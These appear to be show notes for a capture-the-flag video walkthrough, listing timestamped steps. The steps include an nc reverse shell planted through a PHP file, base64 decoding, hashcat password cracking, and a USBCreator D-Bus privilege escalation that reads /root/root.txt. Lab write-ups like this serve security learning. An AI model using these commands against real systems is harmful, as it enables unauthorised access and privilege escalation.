It took a loooong time to find flags as I went through lots of files.
linpeas.sh is great, but there’s just so many files needed to be investigate manually.
In video, I skipped those investigations that didn’t lead to flags.
01:05 Exploit php file
nc -e /bin/bash 10.10.14.8 1234
01:39 Investigate base64 encoded lines
grep -v 'denied' lines | base64 -d
I just guessed it’s base64, as it looked like it, but we can check it with “echo line | wc -c”.
It w return 64
01:53 Crack hash
hashid -m 4bdd0a*****
hashcat -m 1400 hashes /usr/share/wordlists/rockyou.txt
02:34 .viminfo investigation
usr_21 - Vim Documentation
The viminfo file is designed to store status information:
Command-line and Search pattern history
Text in registers
Marks for various files
The buffer list
Global variables
03:02 USBCreator vulnerability exploit
USBCreator D-Bus Privilege Escalation in Ubuntu Desktop
A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by...
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /tmp/test true